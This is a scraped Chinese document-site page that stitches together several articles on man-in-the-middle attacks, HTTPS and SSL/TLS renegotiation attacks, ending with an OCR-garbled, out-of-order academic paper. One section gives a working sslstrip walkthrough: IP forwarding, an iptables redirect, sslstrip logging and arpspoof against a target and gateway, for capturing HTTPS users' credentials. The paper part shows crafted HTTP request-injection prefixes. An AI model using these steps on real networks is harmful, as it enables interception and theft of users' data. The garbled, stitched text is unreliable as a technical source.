SSL\TSL中基于重新协商的中间人攻击及防范

合集下载

安全协议攻击

安全协议攻击

安全协议攻击在当今信息化社会,网络安全问题备受关注。

安全协议攻击是一种常见的网络安全威胁,它可以对网络通信进行破坏和篡改,给个人和组织带来严重的损失。

本文将就安全协议攻击的定义、类型、影响和防范措施进行详细介绍。

安全协议攻击是指黑客利用漏洞或错误设计的安全协议,通过各种手段对网络通信进行攻击的行为。

安全协议包括SSL/TLS、IPsec、SSH等,它们在保障网络通信安全方面起着至关重要的作用。

然而,由于设计缺陷或实现错误,安全协议往往存在各种漏洞,成为黑客攻击的目标。

安全协议攻击的类型多种多样,其中包括中间人攻击、重放攻击、伪造攻击等。

中间人攻击是指黑客利用某种手段插入自己作为中间人,窃取通信双方的信息,甚至篡改通信内容。

重放攻击则是黑客截获通信数据后重新发送,以达到欺骗对方的目的。

伪造攻击则是利用伪造的身份信息进行通信,欺骗对方相信自己的身份。

安全协议攻击对个人和组织的影响极其严重。

个人隐私信息可能被窃取,财产可能受到损失,甚至可能引发身份盗用等问题。

对于组织而言,安全协议攻击可能导致商业机密泄露、财务损失、声誉受损等严重后果,甚至可能导致整个组织的瘫痪。

为了有效防范安全协议攻击,个人和组织需要采取一系列的防范措施。

首先,及时更新安全协议软件,修补已知漏洞,以确保通信安全。

其次,采用加密技术对通信数据进行加密,防止被窃取和篡改。

此外,建立完善的安全策略和监控机制也是防范安全协议攻击的重要手段。

总之,安全协议攻击是一种常见的网络安全威胁,对个人和组织都具有严重的危害。

为了有效防范安全协议攻击,个人和组织需要加强安全意识,采取有效的防范措施,确保网络通信的安全。

只有这样,我们才能更好地享受信息化带来的便利和福利。

中间人攻击原理

中间人攻击原理

中间人攻击原理中间人攻击(Man-in-the-Middle Attack,简称MITM攻击)是一种常见的网络安全威胁,它利用恶意攻击者窃取、篡改或者伪造通信数据的方法,对通信双方进行欺骗,使得双方认为他们正在与对方直接通信,但实际上所有的通信都经过了攻击者的篡改和监控。

中间人攻击的原理非常巧妙,攻击者可以在通信的两端分别与双方建立连接,然后将双方的通信数据全部经过自己的服务器进行处理,实现对通信内容的窃取和篡改。

下面我们将详细介绍中间人攻击的原理及其防范措施。

中间人攻击的原理主要是利用了网络通信的不安全性,攻击者可以通过多种手段介入通信过程,例如ARP欺骗、DNS劫持、SSL劫持等。

在ARP欺骗中,攻击者可以发送伪造的ARP响应包,将受害者的IP地址映射到自己的MAC地址上,从而使得受害者的通信数据都经过攻击者的设备,攻击者可以对通信数据进行窃取和篡改。

在DNS劫持中,攻击者可以篡改DNS解析结果,将受害者的域名解析到攻击者控制的恶意网站上,使得受害者在访问正常网站时被重定向到恶意网站,从而窃取用户的账号密码等信息。

在SSL劫持中,攻击者可以利用自签名证书欺骗受害者,使得受害者认为自己正在和目标网站进行SSL加密通信,但实际上通信数据都经过了攻击者的服务器,攻击者可以窃取SSL通信中的敏感信息。

针对中间人攻击,我们可以采取一些有效的防范措施。

首先,使用加密通信协议可以有效防止中间人攻击,例如HTTPS协议可以保护通信数据的机密性和完整性,使得攻击者无法窃取和篡改通信数据。

其次,使用双向认证可以有效防止中间人攻击,双向认证要求服务端和客户端都需要验证对方的身份,防止攻击者冒充合法的通信对端进行攻击。

此外,加强网络安全意识教育也是防范中间人攻击的重要手段,用户需要警惕不明身份的网络连接和网站,避免在不安全的网络环境下进行重要的通信和交易。

总之,中间人攻击是一种常见的网络安全威胁,攻击者可以利用各种手段窃取、篡改或者伪造通信数据,对通信双方进行欺骗。

HTTPS原理中的中间人攻击

HTTPS原理中的中间人攻击

HTTPS原理中的中间人攻击HTTPS(HyperText Transfer Protocol Secure)是一种基于加密通信协议的HTTP协议,通过使用SSL或TLS协议对通信进行加密,确保信息传输的安全性。

然而,尽管HTTPS被广泛应用于保护用户的隐私和数据安全,但中间人攻击仍然是一种可能的威胁。

一、HTTPS工作原理简介HTTPS通过使用加密和认证的方法来确保通信的安全性。

当客户端(浏览器)与服务器建立连接时,经过以下步骤实现通信加密:1. 客户端发送连接请求到服务器的标准端口,即443端口。

2. 服务器发送其SSL证书给客户端。

3. 客户端验证证书的合法性,包括验证证书的发布者和有效期。

4. 客户端生成会话密钥并使用服务器的公钥进行加密,然后发送给服务器。

5. 服务器使用其私钥解密客户端发送的会话密钥。

6. 客户端和服务器通过会话密钥加密和解密数据进行通信。

由于数据在传输过程中被加密,使得中间人在截获数据后很难解密和篡改。

二、中间人攻击的原理中间人攻击是指攻击者在通信过程中插入自己作为“中间人”的身份,对通信进行监控、篡改或窃取信息。

中间人攻击一般需要满足以下条件:1. 攻击者能够截获客户端和服务器之间的通信。

2. 攻击者能够伪造或替换SSL证书。

中间人攻击的过程如下:1. 客户端向服务器发送连接请求。

2. 攻击者截获客户端发送的请求,并伪造一个与服务器的连接。

3. 伪造的连接中,攻击者自己充当服务器的角色向客户端发送伪造的SSL证书。

4. 客户端接收到伪造的证书后,会验证证书的合法性,包括验证发布者和有效期。

5. 攻击者可能使用自己的数字证书或者伪造的数字证书,使得客户端认为连接是安全的。

6. 客户端生成会话密钥并使用攻击者的公钥进行加密,然后发送给攻击者。

7. 攻击者使用自己的私钥解密客户端发送的会话密钥。

8. 攻击者与服务器建立连接,使用会话密钥与服务器进行加密和解密通信。

9. 攻击者同时与客户端和服务器保持通信,对接收到的数据进行解密和篡改,然后再次加密发送给目标。

攻防:运用sslstrip进行中间人攻击(Bypasshttps)漏洞预警-电脑资料

攻防:运用sslstrip进行中间人攻击(Bypasshttps)漏洞预警-电脑资料

攻防:运用sslstrip进行中间人攻击(Bypasshttps)漏洞预
警-电脑资料
大家都知在内网进行中间人攻击可以使得攻击者更有效地截获内网用户的密码及隐秘信息,。

在BackTrack环境下使用EtterCap or ArpSpoof工具即可. 但Ettercap支持的协议中, 仅对HTTP、FTP、Telnet、SMTP等以明文传输的协议有效. 对HTTPS这样用了OpenSSL的就没办法了..... 直到刚在US举行的black hat 2009会上,一老黑发布的名为sslstrip的software,变像的解决了此问题.
用法分为以下几步:
1) 用命令 echo "1" > /proc/sys/net/ipv4/ip_forward 将你的机子进入forwarding mode.
2) 用命令iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000 使iptables把所有http数据导入sslstrip.
3) 运行 sslstrip -a -w ssllog (写入文本)
4) 运行 arpspoof -i eth0 -t 192.168.1.15 (目标) 192.168.1.1 (网关)
接下来就耐心等待吧! ;) 要提下的是生成的log文件如ssllog其实是html格式的.用konquer可以打开,这样连目标在看的网页面也一清二楚了. 以上均在自个的LAN和BT3下测试完成.。

网络中间人攻击的识别和预防方法

网络中间人攻击的识别和预防方法

网络中间人攻击的识别和预防方法第一章:网络中间人攻击的概述网络中间人攻击是一种常见的网络安全威胁,攻击者通过伪装成通信方的一方或者干扰通信,获取敏感信息或者篡改通信内容。

网络中间人攻击对个人隐私、商业机密、国家安全等带来了严重威胁。

为了保护网络通信的安全,我们需要了解如何识别和预防这种攻击。

第二章:常见的网络中间人攻击类型网络中间人攻击可以分为主动攻击和被动攻击。

主动攻击包括Wi-Fi攻击、ARP欺骗、DNS欺骗等等。

被动攻击包括网络嗅探、中间人代理等等。

在这一章节中,我们将介绍网络中间人攻击的具体类型,并且深入分析它们的工作原理和技术手段。

第三章:网络中间人攻击的影响网络中间人攻击对个人、组织和国家的影响很大。

个人的银行账户、社交媒体账户等可能被攻击者窃取;组织的商业机密、客户数据可能被泄露,导致经济损失;国家的重要信息被窃听或者篡改,威胁国家安全。

这一章节中,我们将具体阐述网络中间人攻击对不同实体的具体影响。

第四章:网络中间人攻击的识别方法为了防止网络中间人攻击,我们需要能够及时准确地识别这种攻击。

在这一章节中,我们将介绍几种常用的识别方法,包括TLS/SSL证书检查、安全通信协议的使用、流量分析等等。

同时,我们还将讨论这些方法的优势和劣势,并且提供一些建议用于改善这些方法的可靠性和准确性。

第五章:网络中间人攻击的预防方法识别网络中间人攻击只是第一步,我们还需要采取预防措施来降低攻击的风险。

在这一章节中,我们将介绍一些常见的预防方法,包括加密通信、强密码的使用、访问受信任的网络、定期更新软件等等。

我们还会提供一些实际应用中的案例来说明这些预防方法的有效性和可行性。

第六章:网络中间人攻击的应对策略即使采取了识别和预防措施,仍然无法保证完全阻止网络中间人攻击。

因此,我们需要有应对策略,及时发现并且应对这些攻击。

在这一章节中,我们将探讨一些常用的应对策略,包括疑似攻击流量的监测、网络流量分析、安全事件响应等等。

HTTPS原理HTTPS如何抵御中间人劫持攻击

HTTPS原理HTTPS如何抵御中间人劫持攻击

HTTPS原理HTTPS如何抵御中间人劫持攻击HTTPS原理及如何抵御中间人劫持攻击随着互联网的发展和信息传输的广泛应用,网络安全问题也日益凸显。

而HTTPS(HyperText Transfer Protocol Secure)作为一种加密传输协议,为我们提供了更高级别的数据安全保护。

本文将介绍HTTPS的原理,并详细阐述如何使用HTTPS来抵御中间人劫持攻击。

一、HTTPS的原理HTTPS是一种在HTTP基础上增加了加密和认证功能的协议,它通过使用SSL(Secure Sockets Layer)或TLS(Transport Layer Security)协议来实现数据的安全传输。

1. 加密传输HTTPS通过使用公钥加密技术,将原始数据加密为密文,使得中间人无法窃取或篡改传输的数据。

在传输过程中,客户端会向服务器请求公钥,并使用该公钥对数据进行加密。

只有服务器拥有相应的私钥,才能解密密文并获取原始数据。

这种加密方式能有效地保护用户的隐私和敏感信息。

2. 数字证书为了确保服务器的身份认证,HTTPS使用数字证书来验证服务器的真实性。

数字证书是由可信任的第三方机构颁发的,其中包含了服务器的公钥和相关的身份信息。

客户端在与服务器建立连接时会验证数字证书的有效性,确保通信的安全性。

二、如何抵御中间人劫持攻击中间人劫持攻击是指攻击者通过某种手段篡改或截获通信双方的数据,在双方不知情的情况下获取敏感信息。

HTTPS通过以下几种方式来抵御中间人劫持攻击。

1. 数字证书验证HTTPS使用数字证书来验证服务器的身份。

在与服务器建立连接时,客户端会对服务器发送的证书进行验证。

客户端会检查证书的有效性,包括证书签名是否可信、证书是否过期等。

如果验证不通过,客户端会提示证书错误,从而防止中间人劫持。

2. 安全通信通道HTTPS使用SSL或TLS协议来建立安全的通信通道。

该协议使用了密钥交换、对称加密和消息认证等技术,确保通信过程中的数据不被中间人窃取或篡改。

HTTPS协议中的中间人攻击

HTTPS协议中的中间人攻击

HTTPS协议中的中间人攻击HTTPS(Hypertext Transfer Protocol Secure)是一种加密通信协议,用于保护互联网传输中的安全性。

然而,即使使用HTTPS,也并非绝对安全,存在着中间人攻击的潜在威胁。

中间人攻击是一种黑客攻击技术,通过截获和篡改HTTPS通信中的数据,使得通信双方误认为他们正在直接进行加密通信,从而使攻击者能够获取双方的敏感信息。

下面将从攻击原理、攻击过程以及防范措施三个方面来探讨HTTPS协议中的中间人攻击。

一、攻击原理中间人攻击的基本原理是攻击者通过某种手段插入到HTTPS通信的中间,在被攻击的通信流中使用自己的证书与客户端和服务器进行交互。

攻击者冒充服务器与客户端建立连接,并且冒充客户端与服务器建立另一个连接,形成了一个"攻击者 - 服务器 - 客户端"的通信链路。

例如,在公共无线网络或不可信任的网络环境中,攻击者可以使用网络嗅探工具截获通信数据流,然后将其重新封装并转发给另一方,使双方都不知道数据已被篡改。

二、攻击过程中间人攻击的过程可以分为三个主要步骤:拦截、篡改和伪装。

1. 拦截:攻击者通过各种手段,如ARP欺骗、DNS劫持等,将自己置于通信双方之间,截获HTTPS请求和响应的数据流。

2. 篡改:攻击者使用自己的证书与客户端和服务器进行交互,并对通信中的数据进行篡改。

攻击者可以修改响应内容,添加恶意代码或者篡改敏感信息,使其看起来正常运作。

3. 伪装:攻击者冒充合法的服务器向客户端发送伪造的证书,使客户端安装并信任这个证书。

客户端在此后与攻击者建立的连接中会认为自己在与合法服务器进行通信,而实际上是在与攻击者进行通信。

三、防范措施为了有效预防中间人攻击,以下是一些常见的防范措施:1. 使用可信任的证书:确保使用由可信任的证书颁发机构(CA)签发的证书。

客户端验证服务器证书的有效性时,会检查证书是否被CA信任,以及证书中的相关信息是否与服务器的信息匹配。

HTTPS原理HTTPS如何防范中间人攻击

HTTPS原理HTTPS如何防范中间人攻击

HTTPS原理HTTPS如何防范中间人攻击HTTPS原理 HTTPS(Hypertext Transfer Protocol Secure)是基于传统的HTTP协议之上添加了加密和身份验证机制的安全传输协议。

它通过使用SSL(Secure Sockets Layer)或者TLS(Transport Layer Security)加密协议来确保在客户端和服务器之间进行的数据传输的安全性。

HTTPS的出现有效地解决了网络传输过程中数据被窃听和篡改的问题,大大提高了数据传输的安全性。

HTTPS如何防范中间人攻击中间人攻击(Man-in-the-Middle Attack)指的是黑客在通信的两端中间插入自己的设备,以窃取或篡改通信的数据。

对于HTTP协议而言,由于数据在传输过程中不加密,因此很容易受到中间人攻击的威胁。

而HTTPS在设计上通过多种方式来防范中间人攻击,保障数据的安全性。

1. 数字证书的使用 HTTPS通过数字证书来验证服务器的身份和确保数据的完整性。

服务器会向证书颁发机构申请一份数字证书,证书包含了服务器的公钥、证书颁发机构的签名等信息。

当客户端与服务器进行握手的时候,服务器会向客户端发送数字证书,客户端会使用证书中的公钥对证书进行解密和验证。

如果验证通过,客户端就可以使用证书中的公钥对数据进行加密,确保通信过程中数据的机密性和完整性。

2. 对称加密算法的使用在HTTPS通信建立之后,客户端和服务器会协商选择一种对称加密算法来保护数据的机密性。

对称加密算法使用相同的密钥对数据进行加密和解密,通信双方都知道密钥。

在握手过程中,服务器会向客户端发送一个随机生成的密钥,客户端使用服务器的公钥进行解密,得到密钥后使用该密钥对数据进行加密。

由于密钥是在握手过程中动态生成且仅限通信双方知晓,中间人无法窃取到密钥来解密通信数据。

3. 客户端和服务器身份认证利用数字证书的机制,HTTPS可以确保通信双方的身份是可信的。

  1. 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
  2. 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
  3. 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
很 大 程 度 上 关 系 到 事 情 的 成 败 。 因此 , S L L \T 议 逐 渐 被 应 用 于 各 种 应 用通 话 协 议 中 , 提 供 加 密 、 验 证 等 安 全 性 服 务 。 基 于 s L\T s S S协 S L
协议 的漏 洞 ,针 对 其 的 攻 击 方 法逐 渐 出现 ,基 于重 新 协 商的 中间人 攻 击 方 法 就是 一 个 很 大 的威 胁 。为 了分 析这 种 威 胁 到底 有 多大 ,
一 ・ ・ ・ 一 ・ ・ ・ ・
服务器收到了要求 , 并意识到需要对客户端的认证 。 S 向S L协议标准 详述的那样, 该要求将会在握手协议之前被缓存。 如上所述 , 新的S L连接在服务器和客户端之间被建立。 S 服务器确定 缓存的邀请是由客户端提 出的从而服务器按客户端的要求进行操作 , 而实际 上所 有 的要 求都 是 中间人 冒充 客户 端提 出 的。 不 同的密码 对 要求 当没有要求对客户端进行身份验证时, 另外—种相似的攻击时可能的。 就 好像服务器要求对一些访问地址进行身份认证, 而对另外一些则没有要求。 也 就是说, 服务器对不同的地址有不同程度的加密要求或者要求有不同的密码对。 这种攻击 同前面的攻击很相似 。 客户端想要同服务器建立一次S L S 连 接。 但是, 这次中间人建立连接靠的是最弱密码的漏洞一是通过修稿密码
GE /It rsig uf/Fo Cl n . t T n e etn St f r i t h mlHTTF/1 1\r e . \n C ke:S c e e tCo kik k oo i er tCh n o e r n
来 自于客户端的请求被中间人截获加以修改后作为最终的请求, 让后 发给服务器如下 :
I no e e : g r -n xt
请求的第一部分创建了创建了重新协 商。然后 , ep aie k e l 命令是两 v 个请 求能 够 同时发 出。 下— 个请 求将 会要 求一 些获取 客户 端的 密码认 证的 违
法 操作 。 如前 所 述 , 可 以是一 种 要 求重 新 输入 密 码 的请 求 。 这 最后 , 一请 这 求 以 in r e t 令 结束 , g oe n x命 以使服 务 器 忽略 剩余 的 内容 。 由客户端发送 的请求可如下:
GET /P a e Do t fAut ntc td l cTo S u he iae /ByCl n . t i t h mlH丁I e ’ P/1 1 . Ho t x mpl.o \ \ s:e a ec m r n
C n e t n ls \ \ o n ci :c e r n o o
GET / a e Do t fAu he fc td/ Plc To S u t n a e ByCintht lH1r i le . m v P/1 1 .

Ho t e a l .o r n s : x mpe c m\ \ Nhomakorabea—
C n et n: l e r n o n ci o co \ \ s C o i : e r tCin o k e r n o k e S ce l tC o i k e \
ses p c 来完成 的 。
首先, 中间 人 发出 建立 重新 协 商 的请 求 。 种请 求是 要 求更 换一 个 相 这 对于 原来 的密 码更 安 全的 密码 , 而建 立 一次 重新 协商 , 击的 剩 余过程 与 从 攻 前述 的攻 击过程 完 全相 同 。 不 同之 处在 于本 次 共 计插 入 了请 求 。 因为 客户 端努 力得 到 服 务器 的认 证, 中间人仅凭让服务器认为该请求是 由客户端发送的。 因此 , 他不得不很 小心的产生请求, 所以他利用了客户端后来发送的数据, 这些数据可得到向 用户密码一样的有用信息。 很有可能 , 客户端将通过S L S 连接 向服务器发送一个包含密码的请求 以证明他的身份。 被中间人截获的请求将会作为这个请求的前缀 , 利用这一 点, 中间人 可 以插 入 以下 信 息 :
S L TL 中重 新协 商 概述 S\ S 所以 中间人 发送一 个重 输客 户密码 的要 求 , 从而 可 以通 过 中间人攻 击将 客户 的钱转到中间人的账户上 。
SLTL S \ S 是位于一种可靠地网络层 协议 ̄T P p C 协议之上的一个协议 , 该协议是为了在客户端和服务器之 间生成一个安全的连接, 这种连接是私密 的、 可靠的并且通信双方可以互相验证双方 的身份 。 以S I T I 所 S S \ 协议应 该具有机密性 、 完整性和确定性。 重 新协商 个 S L协 没一旦 建 立起 来 , S 客户 端 ( 和 服务 器 ( ) 可 以要 一 C) S都 次 重新 协商 , 为 重新 握 手 , 将会 导 致在 加密 的信道 上 尽心 一 次握 手 , 也称 这 C可以通 过 发送 一 个新 的cin l 消息 来创 建 一 次重 新 协商 。 l tHe o e l 同样地 , S 可以 发送 一个 Hel e us l rq et消 息 , o 从而 使 C回应 一个 新 的ci tHe o ln l , e l 以 创建一 个重 新协 商 , 重 新协商 的 牧 的诗更 新密 钥 , 建立 增强 所 用密码 组 的 保密性和从 C到s的省份认证等等 。 会话 回复 会话恢复就是恢复 由会话I D确立的一个原先的S L S 会话, 并使用原先 产生 的密 钥 。 做 的 目的仅 仅是 为 了做 到协议 过 程的 最优 化 : 过一 次 回 这样 进 话重建可以节省通信双方很多工作, 比如节省了一次新的握手 , 也就意味着 避 免 了 一次 R A加 密 \ 密 。 S 解 为 了完成 一 次 会话 恢复 ,C发 送一 个 cin l ,同时 , l tHel e o 附加 上 他 要恢 复 的会话 I D的相 关 内容 。 在他 的 硬 盘 中寻 找一 个 匹配 的I 找 到后 , S D, S 会 回复 一个 S re l ,同时附 加 上找 到 的I 将 e v rHe o l D。 重新 协商 攻 击 在 中间人攻击中, 攻击者将会主动去窃听, 他将截获客户端和服务器 之 间 的连接 , 并使他 们认 为他 们 是在直 接 通话 , 而实 际上他 们是 通 过攻击 者 的 “ 接 通 话 的 。 转 来 要完 成 中间 人 攻击 , 中间人 必 须截 获 客户 端 和服 务 器 之 间的所 有通信 信 息 , 样 中间人 可以选 择有 用的信 息并 且它可 以将 新的 信 这 息 随意 的插 入 。 对 攻击 过程 的概 述 中间人 攻 击用 了 s L 议 的重 新协 商 , 概 的攻 击过 程 如下 : S协 大 客 户端 想 要与 服 务器 进 行一 次安全 的S L连接 通 信 。C 先发 送 一 S 首 ce tHe o l n l 以开始握手过程 。 i l ci tHel被 中间 人截 获 。 l n l e o 中问人 ( M)发送一个 ci tHel l n l e o给S,从而在 M和s之间建立 次 S L 话。 S会 重 新协 商 被建 立 : M向客 户 端( ) 送一 个cln L 或者M 向S c发 l tHel e o 发 送一仓重新协商的请求。 这两种方法都可以建立重新协商。 S向 M 发送 He o rq et 至 此重 新 协商 建 立 U e u s, 握 手过 程在数 据 到达应 用层 之前 结束 , 以任何 由服务 器 在我 手结 束 所 之前 接受 的数据将 缓存 在服务 器 中。 果重 新协商 是 由中间人 发 送的请 求实 如 现的 , 那么这些缓存将包括创建重新协商的请求。 M 和 S S L连接 的基 础 上 ,c和 M 之 间的 连接 也建 立 起 来 。 可 在 S M 以阅读和修改在 C和S之间传递 的信息。 C 通信传递的数据是放M在掐面插入了新的数据的缓存数据。 和S H ts tp 中的客 户 端 身份 认 证 些Ht t #器的功能可以供过不同服务器的不同认证要求来改变。  ̄ 有 些服 务器 要求 自我的 身份 认证 , 些 则 不要求 。 府和 银 行的 网络 大都 而有 政 用Ht 连接 , s 但他们都 不要求对客户端进行身份认证, 一是大多数客户可 以进入网站 , 但当用户需要获取个人信息或转账 时, 对客户端进行认证是必 不 可少 的 。 一过 程 可 以被 重新 协 商所 利 用 。 这 比方说 , 个客 户 想要 通 过 Htp 与 家庭 银 行进 行 连接 。 的 浏 览器 一 ts 他 发送cin l , l tHel 该信息如一 文介绍的那样被截获 , e o h 从而一个S L S 连接在 服务 器 同 中间人 之 间建立 了起 来 。 现在, 中间 人成 为 了攻 击 过程 的 核心 , 它产 生 一个 可 以从 服 务器 创 建 重 新协 商 的请 求 , 而他 将 可 以做 一些 违 法 的事 情 。 从 由于需 要 客户 的认 证 ,
GET /PlcTr ̄ rn Re e oi to h mlHTTP/I 1 ae i i g/ n g tain. t ge .
Ho t e a l.o r n s : x mp e c m\ \ C n et n:k e -a v \ \ onco i ep l e r n i
、 力 ,
6 4
中 子商务 . 00 0 国电 1 1 .8 2
本 论 文 对 中 间 人 攻 击 方 法 的 原 理 进 行 了探 讨 并 简 单 介 绍 了一 些 攻 击 的 实 例 。
【 关键 词 】网络安 全 S \T L S协议 中间人 攻击 重新 协 商 s k 中 图 分 类 号 :TP 9 .8 文 献 标 识 码 :B 文 章 编 号 : 】 0 — 0 7 2 1 ) 8 6 — 1 3 30 0 9 4 6 f 0 0 .4 0 O
S L T L中基于重新协商的中 问人攻击 及防范 S\ S
赵 志 礼 河 南省 产 权 交 易 中心
相关文档
最新文档